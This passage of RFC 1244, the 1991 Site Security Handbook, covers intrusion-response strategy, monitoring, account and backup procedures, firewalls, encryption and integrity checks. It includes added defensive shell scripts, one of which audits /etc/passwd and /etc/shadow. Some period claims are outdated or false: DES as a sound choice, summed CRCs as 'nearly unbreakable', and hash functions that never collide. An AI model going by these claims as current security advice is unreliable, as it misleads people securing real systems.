exempt a site from possible user lawsuits if damage is done to their
systems and data.

Prosecution is not the only outcome possible if the intruder is
identified. If the culprit is an employee or a student, the
organization may choose to take disciplinary actions. The computer
security policy needs to spell out the choices and how they will be
selected if an intruder is caught.

Careful consideration must be made by site management regarding their
approach to this issue before the problem occurs. The strategy
adopted might depend upon each circumstance. Or there may be a
global policy which mandates one approach in all circumstances. The
pros and cons must be examined thoroughly and the users of the
facilities must be made aware of the policy so that they understand
their vulnerabilities no matter which approach is taken.

The following are checklists to help a site determine which strategy
to adopt: “Protect and Proceed” or “Pursue and Prosecute”.

Protect and Proceed

1. If assets are not well protected.

2. If continued penetration could result in great
financial risk.

3. If the possibility or willingness to prosecute
is not present.

4. If user base is unknown.

5. If users are unsophisticated and their work is
vulnerable.

6. If the site is vulnerable to lawsuits from users, e.g.,
if their resources are undermined.

Pursue and Prosecute

1. If assets and systems are well protected.

2. If good backups are available.

3. If the risk to the assets is outweighed by the
disruption caused by the present and possibly future
penetrations.

4. If this is a concentrated attack occurring with great
frequency and intensity.

5. If the site has a natural attraction to intruders, and
consequently regularly attracts intruders.

6. If the site is willing to incur the financial (or other)
risk to assets by allowing the penetrator to continue.

7. If intruder access can be controlled.

8. If the monitoring tools are sufficiently well-developed
to make the pursuit worthwhile.

9. If the support staff is sufficiently clever and knowledgeable
about the operating system, related utilities, and systems
to make the pursuit worthwhile.

10. If there is willingness on the part of management to
prosecute.

11. If the system administrators know in general what kind of
evidence would lead to prosecution.

12. If there is established contact with knowledgeable law
enforcement.

13. If there is a site representative versed in the relevant
legal issues.

14. If the site is prepared for possible legal action from
its own users if their data or systems become compromised
during the pursuit.

2.6 Interpreting the Policy

It is important to define who will interpret the policy. This could
be an individual or a committee. No matter how well written, the
policy will require interpretation from time to time and this body
would serve to review, interpret, and revise the policy as needed.

2.7 Publicizing the Policy

Once the site security policy has been written and established, a
vigorous process should be engaged to ensure that the policy
statement is widely and thoroughly disseminated and discussed. A
mailing of the policy should not be considered sufficient. A period
for comments should be allowed before the policy becomes effective to
ensure that all affected users have a chance to state their reactions
and discuss any unforeseen ramifications. Ideally, the policy should
strike a balance between protection and productivity.

Meetings should be held to elicit these comments, and also to ensure
that the policy is correctly understood. (Policy promulgators are
not necessarily noted for their skill with the language.) These
meetings should involve higher management as well as line employees.
Security is a collective effort.

In addition to the initial efforts to publicize the policy, it is
essential for the site to maintain a continual awareness of its
computer security policy. Current users may need periodic reminders.
New users should have the policy included as part of their site
introduction packet. As a condition for using the site facilities,
it may be advisable to have them sign a statement that they have read
and understood the policy. Should any of these users require legal
action for serious policy violations, this signed statement might
prove to be a valuable aid.

3. Establishing Procedures to Prevent Security Problems

The security policy defines what needs to be protected. This section
discusses security procedures which specify what steps will be used
to carry out the security policy.

3.1 Security Policy Defines What Needs to be Protected

The security policy defines the WHAT’s: what needs to be protected,
what is most important, what the priorities are, and what the general
approach to dealing with security problems should be.

The security policy by itself doesn’t say HOW things are protected.
That is the role of security procedures, which this section
discusses. The security policy should be a high level document,
giving general strategy. The security procedures need to set out, in
detail, the precise steps your site will take to protect itself.

The security policy should include a general risk assessment of the
types of threats a site is most likely to face and the consequences
of those threats (see section 2.2). Part of doing a risk assessment
will include creating a general list of assets that should be
protected (section 2.2.2). This information is critical in devising
cost-effective procedures.

It is often tempting to start creating security procedures by
deciding on different mechanisms first: “our site should have logging
on all hosts, call-back modems, and smart cards for all users.” This
approach could lead to some areas that have too much protection for
the risk they face, and other areas that aren’t protected enough.
Starting with the security policy and the risks it outlines should
ensure that the procedures provide the right level of protection for all
assets.

3.2 Identifying Possible Problems

To determine risk, vulnerabilities must be identified. Part of the
purpose of the policy is to aid in shoring up the vulnerabilities and
thus to decrease the risk in as many areas as possible. Several of
the more popular problem areas are presented in sections below. This
list is by no means complete. In addition, each site is likely to
have a few unique vulnerabilities.

3.2.1 Access Points

Access points are typically used for entry by unauthorized users.
Having many access points increases the risk of access to an
organization’s computer and network facilities.

Network links to networks outside the organization allow access
into the organization for all others connected to that external
network. A network link typically provides access to a large
number of network services, and each service has a potential to be
compromised.

Dialup lines, depending on their configuration, may provide access
merely to a login port of a single system. If connected to a
terminal server, the dialup line may give access to the entire
network.

Terminal servers themselves can be a source of problems. Many
terminal servers do not require any kind of authentication.
Intruders often use terminal servers to disguise their actions,
dialing in on a local phone and then using the terminal server to
go out to the local network. Some terminal servers are configured
so that intruders can TELNET [19] in from outside the network, and
then TELNET back out again, again serving to make it difficult to
trace them.

3.2.2 Misconfigured Systems

Misconfigured systems form a large percentage of security holes.
Today’s operating systems and their associated software have
become so complex that understanding how the system works has
become a full-time job. Often, systems managers will be
non-specialists chosen from the current organization’s staff.

Vendors are also partly responsible for misconfigured systems. To
make the system installation process easier, vendors occasionally
choose initial configurations that are not secure in all
environments.

3.2.3 Software Bugs

Software will never be bug free. Publicly known security bugs are
common methods of unauthorized entry. Part of the solution to
this problem is to be aware of the security problems and to update
the software when problems are detected. When bugs are found,
they should be reported to the vendor so that a solution to the
problem can be implemented and distributed.

3.2.4 “Insider” Threats

An insider to the organization may be a considerable threat to the
security of the computer systems. Insiders often have direct
access to the computer and network hardware components. The
ability to access the components of a system makes most systems
easier to compromise. Most desktop workstations can be easily
manipulated so that they grant privileged access. Access to a
local area network provides the ability to view possibly sensitive
data traversing the network.

3.3 Choose Controls to Protect Assets in a Cost-Effective Way

After establishing what is to be protected, and assessing the risks
these assets face, it is necessary to decide how to implement the
controls which protect these assets. The controls and protection
mechanisms should be selected in a way so as to adequately counter
the threats found during risk assessment, and to implement those
controls in a cost effective manner. It makes little sense to spend
an exorbitant sum of money and overly constrict the user base if the
risk of exposure is very small.

3.3.1 Choose the Right Set of Controls

The controls that are selected represent the physical embodiment
of your security policy. They are the first and primary line of
defense in the protection of your assets. It is therefore most
important to ensure that the controls that you select are the
right set of controls. If the major threat to your system is
outside penetrators, it probably doesn’t make much sense to use
biometric devices to authenticate your regular system users. On
the other hand, if the major threat is unauthorized use of
computing resources by regular system users, you’ll probably want
to establish very rigorous automated accounting procedures.

3.3.2 Use Common Sense

Common sense is the most appropriate tool that can be used to
establish your security policy. Elaborate security schemes and
mechanisms are impressive, and they do have their place, yet there
is little point in investing money and time on an elaborate
implementation scheme if the simple controls are forgotten. For
example, no matter how elaborate a system you put into place on
top of existing security controls, a single user with a poor
password can still leave your system open to attack.

3.4 Use Multiple Strategies to Protect Assets

Another method of protecting assets is to use multiple strategies.
In this way, if one strategy fails or is circumvented, another
strategy comes into play to continue protecting the asset. By using
several simpler strategies, a system can often be made more secure
than if one very sophisticated method were used in its place. For
example, dial-back modems can be used in conjunction with traditional
logon mechanisms. Many similar approaches could be devised that
provide several levels of protection for assets. However, it’s very
easy to go overboard with extra mechanisms. One must keep in mind
exactly what it is that needs to be protected.

3.5 Physical Security

It is a given in computer security that if the system itself is not
physically secure, nothing else about the system can be considered
secure. With physical access to a machine, an intruder can halt the
machine, bring it back up in privileged mode, replace or alter the
disk, plant Trojan horse programs (see section 2.13.9.2), or take any
number of other undesirable (and hard to prevent) actions.

Critical communications links, important servers, and other key
machines should be located in physically secure areas. Some security
systems (such as Kerberos) require that the machine be physically
secure.

If you cannot physically secure machines, care should be taken about
trusting those machines. Sites should consider limiting access from
non-secure machines to more secure machines. In particular, allowing
trusted access (e.g., the BSD Unix remote commands such as rsh) from
these kinds of hosts is particularly risky.

For machines that seem or are intended to be physically secure, care
should be taken about who has access to the machines. Remember that
custodial and maintenance staff often have keys to rooms.

3.6 Procedures to Recognize Unauthorized Activity

Several simple procedures can be used to detect most unauthorized
uses of a computer system. These procedures use tools provided with
the operating system by the vendor, or tools publicly available from
other sources.

3.6.1 Monitoring System Use

System monitoring can be done either by a system administrator, or
by software written for the purpose. Monitoring a system involves
looking at several parts of the system and searching for anything
unusual. Some of the easier ways to do this are described in this
section.

The most important thing about monitoring system use is that it be
done on a regular basis. Picking one day out of the month to
monitor the system is pointless, since a security breach can be
isolated to a matter of hours. Only by maintaining a constant
vigil can you expect to detect security violations in time to
react to them.

3.6.2 Tools for Monitoring the System

This section describes tools and methods for monitoring a system
against unauthorized access and use.

3.6.2.1 Logging

Most operating systems store numerous bits of information in
log files. Examination of these log files on a regular basis
is often the first line of defense in detecting unauthorized
use of the system.

– Compare lists of currently logged in users and past
login histories. Most users typically log in and out
at roughly the same time each day. An account logged
in outside the “normal” time for the account may be in
use by an intruder.

– Many systems maintain accounting records for billing
purposes. These records can also be used to determine
usage patterns for the system; unusual accounting records
may indicate unauthorized use of the system.

– System logging facilities, such as the UNIX “syslog”
utility, should be checked for unusual error messages
from system software. For example, a large number of
failed login attempts in a short period of time may
indicate someone trying to guess passwords.

– Operating system commands which list currently executing
processes can be used to detect users running programs
they are not authorized to use, as well as to detect
unauthorized programs which have been started by an
intruder.
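
The third check in the list above (many failed logins in a short period) can be automated. The script below is an added example, not part of RFC 1244. Its log lines are constructed and use the sshd "Failed password" message format, which is an assumption about the site's login service; detect_bursts and sample_log are names chosen here, and the log is assumed to be in time order.

```shell
#!/bin/sh
# Added example: flag sources with many failed logins in a short period.

# detect_bursts LOGFILE [THRESHOLD] [WINDOW_SECONDS]
# Prints "source first-stamp last-stamp count" once per source, the first time
# THRESHOLD failures from that source fall within WINDOW_SECONDS of each other.
detect_bursts() {
    LC_ALL=C awk -v threshold="${2:-5}" -v window="${3:-60}" '
    BEGIN {
        split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", mon, " ")
        split("0 31 59 90 120 151 181 212 243 273 304 334", off, " ")
        for (i = 1; i <= 12; i++) yday[mon[i]] = off[i]
    }
    # Seconds since 1 January for a "Mon DD HH:MM:SS" stamp. Syslog stamps
    # carry no year, so a non-leap year and no year rollover are assumed.
    function seconds(m, d, hms,    t) {
        split(hms, t, ":")
        return ((yday[m] + d - 1) * 24 + t[1]) * 3600 + t[2] * 60 + t[3]
    }
    /Failed password for/ {
        # The source address follows the last "from" token on the line.
        src = ""
        for (i = 1; i < NF; i++) if ($i == "from") src = $(i + 1)
        if (src == "") next
        now = seconds($1, $2, $3)
        n = ++count[src]
        when[src, n] = now
        text[src, n] = $1 " " $2 " " $3
        # Slide the start of the window past failures older than the window.
        if (!(src in head)) head[src] = 1
        while (now - when[src, head[src]] > window) head[src]++
        inside = n - head[src] + 1
        if (inside >= threshold && !(src in reported)) {
            reported[src] = 1
            print src, text[src, head[src]], text[src, n], inside
        }
    }' "$1"
}

# Constructed sample log (documentation address ranges, invented host name).
sample_log() {
cat <<'EOF'
Dec  1 23:29:58 gw sshd[311]: Accepted password for alice from 192.0.2.44 port 50211 ssh2
Dec  1 23:30:04 gw sshd[312]: Failed password for root from 203.0.113.5 port 40001 ssh2
Dec  1 23:30:09 gw sshd[312]: Failed password for root from 203.0.113.5 port 40001 ssh2
Dec  1 23:30:15 gw sshd[313]: Failed password for invalid user admin from 203.0.113.5 port 40002 ssh2
Dec  1 23:30:21 gw sshd[314]: Failed password for alice from 192.0.2.44 port 50230 ssh2
Dec  1 23:30:27 gw sshd[315]: Failed password for root from 203.0.113.5 port 40003 ssh2
Dec  1 23:30:40 gw sshd[316]: Failed password for invalid user guest from 203.0.113.5 port 40004 ssh2
Dec  1 23:41:02 gw sshd[320]: Failed password for bob from 198.51.100.7 port 33100 ssh2
Dec  1 23:52:10 gw sshd[321]: Failed password for bob from 198.51.100.7 port 33111 ssh2
Dec  2 00:10:31 gw sshd[325]: Failed password for bob from 198.51.100.7 port 33120 ssh2
EOF
}

# With a log file argument, scan it; with none, scan the constructed sample.
if [ "$#" -ge 1 ]; then
    detect_bursts "$@"
else
    sample_log | detect_bursts -
fi
```

A single mistyped password (alice) and three failures spread over half an hour (bob) stay below the default threshold of five failures in 60 seconds; the five failures from one source within 36 seconds do not.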

3.6.2.2 Monitoring Software

Other monitoring tools can easily be constructed using standard
operating system software, by using several, often unrelated,
programs together. For example, checklists of file ownerships
and permission settings can be constructed (for example, with
“ls” and “find” on UNIX) and stored off-line. These lists can
then be reconstructed periodically and compared against the
master checklist (on UNIX, by using the “diff” utility).
Differences may indicate that unauthorized modifications have
been made to the system.
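
One way to build and compare such a checklist, as an added example that is not part of RFC 1244. make_checklist and report_changes are names chosen here; the comparison is done with awk rather than plain "diff" so that each difference is labelled, and file names containing newlines are assumed not to occur.

```shell
#!/bin/sh
# Added example: checklist of permissions and ownership, compared to a master.

# make_checklist DIR
# One line per file under DIR: "mode uid gid path", sorted by path. Times,
# sizes and link counts are left out so that only permission and ownership
# changes show up. Device nodes (two-field size column) are not handled.
make_checklist() {
    ( cd "$1" && LC_ALL=C find . -exec ls -ldn {} + ) |
    LC_ALL=C awk '{
        # ls -ldn fields: mode links uid gid size month day time-or-year name...
        name = $9
        for (i = 10; i <= NF; i++) name = name " " $i
        print $1, $3, $4, name
    }' | LC_ALL=C sort -k4
}

# report_changes MASTER CURRENT
# Prints one ADDED, REMOVED or CHANGED line per difference; prints nothing
# when the current checklist matches the master.
report_changes() {
    LC_ALL=C awk '
    function parse(line,    f, n, i) {
        n = split(line, f, " ")
        attrs = f[1] " " f[2] " " f[3]
        path = f[4]
        for (i = 5; i <= n; i++) path = path " " f[i]
    }
    BEGIN {
        # Load the master first, then let awk read only the current list.
        while ((getline line < ARGV[1]) > 0) { parse(line); master[path] = attrs }
        ARGV[1] = ""
    }
    {
        parse($0)
        seen[path] = 1
        if (!(path in master)) print "ADDED", attrs, path
        else if (master[path] != attrs) print "CHANGED", master[path], "->", attrs, path
    }
    END {
        for (p in master) if (!(p in seen)) print "REMOVED", master[p], p
    }' "$1" "$2" | LC_ALL=C sort
}

# Usage: checklist.sh snapshot DIR > master.txt   (keep master.txt off-line)
#        checklist.sh compare master.txt DIR
case "${1:-}" in
    snapshot) make_checklist "$2" ;;
    compare)
        tmp=$(mktemp) && make_checklist "$3" > "$tmp" && report_changes "$2" "$tmp"
        rm -f "$tmp" ;;
esac
```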

Still other tools are available from third-party vendors and
public software distribution sites. Section 3.9.9 lists
several sources from which you can learn what tools are
available and how to get them.

3.6.2.3 Other Tools

Other tools can also be used to monitor systems for security
violations, although this is not their primary purpose. For
example, network monitors can be used to detect and log
connections from unknown sites.

3.6.3 Vary the Monitoring Schedule

The task of system monitoring is not as daunting as it may seem.
System administrators can execute many of the commands used for
monitoring periodically throughout the day during idle moments
(e.g., while talking on the telephone), rather than spending fixed
periods of each day monitoring the system. By executing the
commands frequently, you will rapidly become used to seeing
“normal” output, and will easily spot things which are out of the
ordinary. In addition, by running various monitoring commands at
different times throughout the day, you make it hard for an
intruder to predict your actions. For example, if an intruder
knows that each day at 5:00 p.m. the system is checked to see that
everyone has logged off, he will simply wait until after the check
has completed before logging in. But the intruder cannot guess
when a system administrator might type a command to display all
logged-in users, and thus he runs a much greater risk of
detection.

Despite the advantages that regular system monitoring provides,
some intruders will be aware of the standard logging mechanisms in
use on systems they are attacking. They will actively pursue and
attempt to disable monitoring mechanisms. Regular monitoring
therefore is useful in detecting intruders, but does not provide
any guarantee that your system is secure, nor should monitoring be
considered an infallible method of detecting unauthorized use.

3.7 Define Actions to Take When Unauthorized Activity is Suspected

Sections 2.4 and 2.5 discussed the course of action a site should
take when it suspects its systems are being abused. The computer
security policy should state the general approach towards dealing
with these problems.

The procedures for dealing with these types of problems should be
written down. Who has authority to decide what actions will be
taken? Should law enforcement be involved? Should your
organization cooperate with other sites in trying to track down an
intruder? Answers to all the questions in section 2.4 should be
part of the incident handling procedures.

Whether you decide to lock out or pursue intruders, you should
have tools and procedures ready to apply. It is best to work up
these tools and procedures before you need them. Don’t wait until
an intruder is on your system to figure out how to track the
intruder’s actions; you will be busy enough if an intruder
strikes.

3.8 Communicating Security Policy

Security policies, in order to be effective, must be communicated to
both the users of the system and the system maintainers. This
section describes what these people should be told, and how to tell
them.

3.8.1 Educating the Users

Users should be made aware of how the computer systems are
expected to be used, and how to protect themselves from
unauthorized users.

3.8.1.1 Proper Account/Workstation Use

All users should be informed about what is considered the
“proper” use of their account or workstation (“proper” use is
discussed in section 2.3.2). This can most easily be done at
the time a user receives their account, by giving them a policy
statement. Proper use policies typically dictate things such
as whether or not the account or workstation may be used for
personal activities (such as checkbook balancing or letter
writing), whether profit-making activities are allowed, whether
game playing is permitted, and so on. These policy statements
may also be used to summarize how the computer facility is
licensed and what software licenses are held by the
institution; for example, many universities have educational
licenses which explicitly prohibit commercial uses of the
system. A more complete list of items to consider when writing
a policy statement is given in section 2.3.

3.8.1.2 Account/Workstation Management Procedures

Each user should be told how to properly manage their account
and workstation. This includes explaining how to protect files
stored on the system, how to log out or lock the terminal or
workstation, and so on. Much of this information is typically
covered in the “beginning user” documentation provided by the
operating system vendor, although many sites elect to
supplement this material with local information.

If your site offers dial-up modem access to the computer
systems, special care must be taken to inform users of the
security problems inherent in providing this access. Issues
such as making sure to log out before hanging up the modem
should be covered when the user is initially given dial-up
access.

Likewise, access to the systems via local and wide-area
networks presents its own set of security problems which users
should be made aware of. Files which grant “trusted host” or
“trusted user” status to remote systems and users should be
carefully explained.

3.8.1.3 Determining Account Misuse

Users should be told how to detect unauthorized access to their
account. If the system prints the last login time when a user
logs in, he or she should be told to check that time and note
whether or not it agrees with the last time he or she actually
logged in.

Command interpreters on some systems (e.g., the UNIX C shell)
maintain histories of the last several commands executed.
Users should check these histories to be sure someone has not
executed other commands with their account.

3.8.1.4 Problem Reporting Procedures

A procedure should be developed to enable users to report
suspected misuse of their accounts or other misuse they may
have noticed. This can be done either by providing the name
and telephone number of a system administrator who manages
security of the computer system, or by creating an electronic
mail address (e.g., “security”) to which users can address
their problems.

3.8.2 Educating the Host Administrators

In many organizations, computer systems are administered by a wide
variety of people. These administrators must know how to protect
their own systems from attack and unauthorized use, as well as how
to communicate successful penetration of their systems to other
administrators as a warning.

3.8.2.1 Account Management Procedures

Care must be taken when installing accounts on the system in
order to make them secure. When installing a system from
distribution media, the password file should be examined for
“standard” accounts provided by the vendor. Many vendors
provide accounts for use by system services or field service
personnel. These accounts typically have either no password or
one which is common knowledge. These accounts should be given
new passwords if they are needed, or disabled or deleted from
the system if they are not.

Accounts without passwords are generally very dangerous since
they allow anyone to access the system. Even accounts which do
not execute a command interpreter (e.g., accounts which exist
only to see who is logged in to the system) can be compromised
if set up incorrectly. A related concept, that of “anonymous”
file transfer (FTP) [20], allows users from all over the
network to access your system to retrieve files from (usually)
a protected disk area. You should carefully weigh the benefits
that an account without a password provides against the
security risks of providing such access to your system.

If the operating system provides a “shadow” password facility
which stores passwords in a separate file accessible only to
privileged users, this facility should be used. System V UNIX,
SunOS 4.0 and above, and versions of Berkeley UNIX after 4.3BSD
Tahoe, as well as others, provide this feature. It protects
passwords by hiding their encrypted values from unprivileged
users. This prevents an attacker from copying your password
file to his or her machine and then attempting to break the
passwords at his or her leisure.

Keep track of who has access to privileged user accounts (e.g.,
“root” on UNIX or “MAINT” on VMS). Whenever a privileged user
leaves the organization or no longer has need of the privileged
account, the passwords on all privileged accounts should be
changed.
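
The password-file examination described in this section can be scripted. The following is an added example, not part of RFC 1244: audit_accounts is a name chosen here, the sample files are constructed, and the field conventions it relies on ("x" meaning the password is in the shadow file, a leading "*" or "!" meaning the account is locked) are assumptions that vary between systems.

```shell
#!/bin/sh
# Added example: find accounts with no password and unshadowed passwords.

# audit_accounts PASSWD_FILE [SHADOW_FILE]
#   NOPASSWD    empty password field: anyone can use the account
#   UNSHADOWED  encrypted password stored in the world-readable passwd file
#   NOSHADOW    passwd says "x" but the shadow file has no entry for the name
#   MALFORMED   line does not have the seven passwd fields
audit_accounts() {
    awk -F: -v shadow="${2:-}" '
    shadow != "" && FILENAME == shadow { hash[$1] = $2; known[$1] = 1; next }
    /^#/ || /^$/ { next }
    NF != 7 { print "MALFORMED line " FNR; next }
    $2 == "" { print "NOPASSWD " $1 " uid=" $3 " shell=" $7; next }
    $2 ~ /^[*!]/ { next }
    $2 == "x" {
        if (shadow == "") next
        if (!($1 in known)) print "NOSHADOW " $1 " uid=" $3
        else if (hash[$1] == "") print "NOPASSWD " $1 " uid=" $3 " shell=" $7
        next
    }
    { print "UNSHADOWED " $1 " uid=" $3 }
    ' ${2:+"$2"} "$1"
}

# Constructed sample files. "sync" and "who" stand for vendor accounts that
# run a single command; "field" stands for a field-service account.
sample_passwd() {
cat <<'EOF'
root:x:0:0:Super User:/:/bin/sh
daemon:*:1:1::/:
sync::20:20:sync disks:/:/bin/sync
who::21:21:list logins:/:/usr/bin/who
field:CONSTRUCTED-HASH-2:30:30:Field Service:/usr/field:/bin/sh
svc:x:40:40:Service:/usr/svc:/bin/sh
ops:x:41:41:Operations:/usr/ops:/bin/sh
broken-line-without-fields
EOF
}

sample_shadow() {
cat <<'EOF'
root:CONSTRUCTED-HASH-1:8000:0:99999:7:::
svc::8000:0:99999:7:::
EOF
}

# Usage: audit.sh /etc/passwd [/etc/shadow]   (the shadow file needs privilege)
if [ "$#" -ge 1 ]; then
    audit_accounts "$@"
fi
```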

3.8.2.2 Configuration Management Procedures

When installing a system from the distribution media or when
installing third-party software, it is important to check the
installation carefully. Many installation procedures assume a
“trusted” site, and hence will install files with world write
permission enabled, or otherwise compromise the security of
files.

Network services should also be examined carefully when first
installed. Many vendors provide default network permission
files which imply that all outside hosts are to be “trusted”,
which is rarely the case when connected to wide-area networks
such as the Internet.

Many intruders collect information on the vulnerabilities of
particular system versions. The older a system, the more
likely it is that there are security problems in that version
which have since been fixed by the vendor in a later release.
For this reason, it is important to weigh the risks of not
upgrading to a new operating system release (thus leaving
security holes unplugged) against the cost of upgrading to the
new software (possibly breaking third-party software, etc.).
Bug fixes from the vendor should be weighed in a similar
fashion, with the added note that “security” fixes from a
vendor usually address fairly serious security problems.

Other bug fixes, received via network mailing lists and the
like, should usually be installed, but not without careful
examination. Never install a bug fix unless you’re sure you
know what the consequences of the fix are – there’s always the
possibility that an intruder has suggested a “fix” which
actually gives him or her access to your system.

3.8.2.3 Recovery Procedures – Backups

It is impossible to overemphasize the need for a good backup
strategy. File system backups not only protect you in the
event of hardware failure or accidental deletions, but they
also protect you against unauthorized changes made by an
intruder. Without a copy of your data the way it’s “supposed”
to be, it can be difficult to undo something an attacker has
done.

Backups, especially if run daily, can also be useful in
providing a history of an intruder’s activities. Looking
through old backups can establish when your system was first
penetrated. Intruders may leave files around which, although
deleted later, are captured on the backup tapes. Backups can
also be used to document an intruder’s activities to law
enforcement agencies if necessary.

A good backup strategy will dump the entire system to tape at
least once a month. Partial (or “incremental”) dumps should be
done at least twice a week, and ideally they should be done
daily. Commands specifically designed for performing file
system backups (e.g., UNIX “dump” or VMS “BACKUP”) should be
used in preference to other file copying commands, since these
tools are designed with the express intent of restoring a
system to a known state.

3.8.2.4 Problem Reporting Procedures

As with users, system administrators should have a defined
procedure for reporting security problems. In large
installations, this is often done by creating an electronic
mail alias which contains the names of all system
administrators in the organization. Other methods include
setting up some sort of response team similar to the CERT, or
establishing a “hotline” serviced by an existing support group.

3.9 Resources to Prevent Security Breaches

This section discusses software, hardware, and procedural resources
that can be used to support your site security policy.

3.9.1 Network Connections and Firewalls

A “firewall” is put in place in a building to provide a point of
resistance to the entry of flames into another area. Similarly, a
secretary’s desk and reception area provides a point of
controlling access to other office spaces. This same technique
can be applied to a computer site, particularly as it pertains to
network connections.

Some sites will be connected only to other sites within the same
organization and will not have the ability to connect to other
networks. Sites such as these are less susceptible to threats
from outside their own organization, although intrusions may still
occur via paths such as dial-up modems. On the other hand, many
other organizations will be connected to other sites via much
larger networks, such as the Internet. These sites are
susceptible to the entire range of threats associated with a
networked environment.

The risks of connecting to outside networks must be weighed
against the benefits. It may be desirable to limit connection to
outside networks to those hosts which do not store sensitive
material, keeping “vital” machines (such as those which maintain
company payroll or inventory systems) isolated. If there is a
need to participate in a Wide Area Network (WAN), consider
restricting all access to your local network through a single
system. That is, all access to or from your own local network
must be made through a single host computer that acts as a
firewall between you and the outside world. This firewall system
should be rigorously controlled and password protected, and
external users accessing it should also be constrained by
restricting the functionality available to remote users. By using
this approach, your site could relax some of the internal security
controls on your local net, but still be afforded the protection
of a rigorously controlled host front end.

Note that even with a firewall system, compromise of the firewall
could result in compromise of the network behind the firewall.
Work has been done in some areas to construct a firewall which
even when compromised, still protects the local network [6,
CHESWICK].

3.9.2 Confidentiality

Confidentiality, the act of keeping things hidden or secret, is
one of the primary goals of computer security practitioners.
Several mechanisms are provided by most modern operating systems
to enable users to control the dissemination of information.
Depending upon where you work, you may have a site where
everything is protected, or a site where all information is
usually regarded as public, or something in-between. Most sites
lean toward the in-between, at least until some penetration has
occurred.

Generally, there are three instances in which information is
vulnerable to disclosure: when the information is stored on a
computer system, when the information is in transit to another
system (on the network), and when the information is stored on
backup tapes.

The first of these cases is controlled by file permissions, access
control lists, and other similar mechanisms. The last can be
controlled by restricting access to the backup tapes (by locking
them in a safe, for example). All three cases can be helped by
using encryption mechanisms.

3.9.2.1 Encryption (hardware and software)

Encryption is the process of taking information that exists in
some readable form and converting it into a non-readable form.
There are several types of commercially available encryption
packages in both hardware and software forms. Hardware
encryption engines have the advantage that they are much faster
than the software equivalent, yet because they are faster, they
are of greater potential benefit to an attacker who wants to
execute a brute-force attack on your encrypted information.

The advantage of using encryption is that, even if other access
control mechanisms (passwords, file permissions, etc.) are
compromised by an intruder, the data is still unusable.
Naturally, encryption keys and the like should be protected at
least as well as account passwords.

Information in transit (over a network) may be vulnerable to
interception as well. Several solutions to this exist, ranging
from simply encrypting files before transferring them (end-to-
end encryption) to special network hardware which encrypts
everything it sends without user intervention (secure links).
The Internet as a whole does not use secure links, thus end-
to-end encryption must be used if encryption is desired across
the Internet.

3.9.2.1.1 Data Encryption Standard (DES)

DES is perhaps the most widely used data encryption
mechanism today. Many hardware and software implementations
exist, and some commercial computers are provided with a
software version. DES transforms plain text information
into encrypted data (or ciphertext) by means of a special
algorithm and “seed” value called a key. So long as the key
is retained (or remembered) by the original user, the
ciphertext can be restored to the original plain text.

One of the pitfalls of all encryption systems is the need to
remember the key under which a thing was encrypted (this is
not unlike the password problem discussed elsewhere in this
document). If the key is written down, it becomes less
secure. If forgotten, there is little (if any) hope of
recovering the original data.

Most UNIX systems provide a DES command that enables a user
to encrypt data using the DES algorithm.

3.9.2.1.2 Crypt

Similar to the DES command, the UNIX “crypt” command allows
a user to encrypt data. Unfortunately, the algorithm used
by “crypt” is very insecure (based on the World War II
“Enigma” device), and files encrypted with this command can
be decrypted easily in a matter of a few hours. Generally,
use of the “crypt” command should be avoided for any but the
most trivial encryption tasks.

3.9.2.2 Privacy Enhanced Mail

Electronic mail normally transits the network in the clear
(i.e., anyone can read it). This is obviously not the optimal
solution. Privacy enhanced mail provides a means to
automatically encrypt electronic mail messages so that a person
eavesdropping at a mail distribution node is not (easily)
capable of reading them. Several privacy enhanced mail
packages are currently being developed and deployed on the
Internet.

The Internet Activities Board Privacy Task Force has defined a
draft standard, elective protocol for use in implementing
privacy enhanced mail. This protocol is defined in RFCs 1113,
1114, and 1115 [7,8,9]. Please refer to the current edition of
the “IAB Official Protocol Standards” (currently, RFC 1200
[21]) for the standardization state and status of these
protocols.

3.9.3 Origin Authentication

We mostly take it on faith that the header of an electronic mail
message truly indicates the originator of a message. However, it
is easy to “spoof”, or forge the source of a mail message. Origin
authentication provides a means to be certain of the originator of
a message or other object in the same way that a Notary Public
assures a signature on a legal document. This is done by means of
a “Public Key” cryptosystem.

A public key cryptosystem differs from a private key cryptosystem
in several ways. First, a public key system uses two keys, a
Public Key that anyone can use (hence the name) and a Private Key
that only the originator of a message uses. The originator uses
the private key to encrypt the message (as in DES). The receiver,
who has obtained the public key for the originator, may then
decrypt the message.

In this scheme, the public key is used to authenticate the
originator’s use of his or her private key, and hence the identity
of the originator is more rigorously proven. The most widely
known implementation of a public key cryptosystem is the RSA
system [26]. The Internet standard for privacy enhanced mail
makes use of the RSA system.

3.9.4 Information Integrity

Information integrity refers to the state of information such that
it is complete, correct, and unchanged from the last time in which
it was verified to be in an “integral” state. The value of
information integrity to a site will vary. For example, it is
more important for military and government installations to
prevent the “disclosure” of classified information, whether it is
right or wrong. A bank, on the other hand, is far more concerned
with whether the account information maintained for its customers
is complete and accurate.

Numerous computer system mechanisms, as well as procedural
controls, have an influence on the integrity of system
information. Traditional access control mechanisms maintain
controls over who can access system information. These mechanisms
alone are not sufficient in some cases to provide the degree of
integrity required. Some other mechanisms are briefly discussed
below.

It should be noted that there are other aspects to maintaining
system integrity besides these mechanisms, such as two-person
controls, and integrity validation procedures. These are beyond
the scope of this document.

3.9.4.1 Checksums

Easily the simplest mechanism, a simple checksum routine can
compute a value for a system file and compare it with the last
known value. If the two are equal, the file is probably
unchanged. If not, the file has been changed by some unknown
means.

Though it is the easiest to implement, the checksum scheme
suffers from a serious failing in that it is not very
sophisticated and a determined attacker could easily add enough
characters to the file to eventually obtain the correct value.

A specific type of checksum, called a CRC checksum, is
considerably more robust than a simple checksum. It is only
slightly more difficult to implement and provides a better
degree of catching errors. It too, however, suffers from the
possibility of compromise by an attacker.

Checksums may be used to detect the altering of information.
However, they do not actively guard against changes being made.
For this, other mechanisms such as access controls and
encryption should be used.

3.9.4.2 Cryptographic Checksums

Cryptographic checksums (also called cryptosealing) involve
breaking a file up into smaller chunks, calculating a (CRC)
checksum for each chunk, and adding the CRCs together.
Depending upon the exact algorithm used, this can result in a
nearly unbreakable method of determining whether a file has
been changed. This mechanism suffers from the fact that it is
sometimes computationally intensive and may be prohibitive
except in cases where the utmost integrity protection is
desired.

Another related mechanism, called a one-way hash function (or a
Manipulation Detection Code (MDC)) can also be used to uniquely
identify a file. The idea behind these functions is that no
two inputs can produce the same output, thus a modified file
will not have the same hash value. One-way hash functions can
be implemented efficiently on a wide variety of systems, making
unbreakable integrity checks possible. (Snefru, a one-way hash
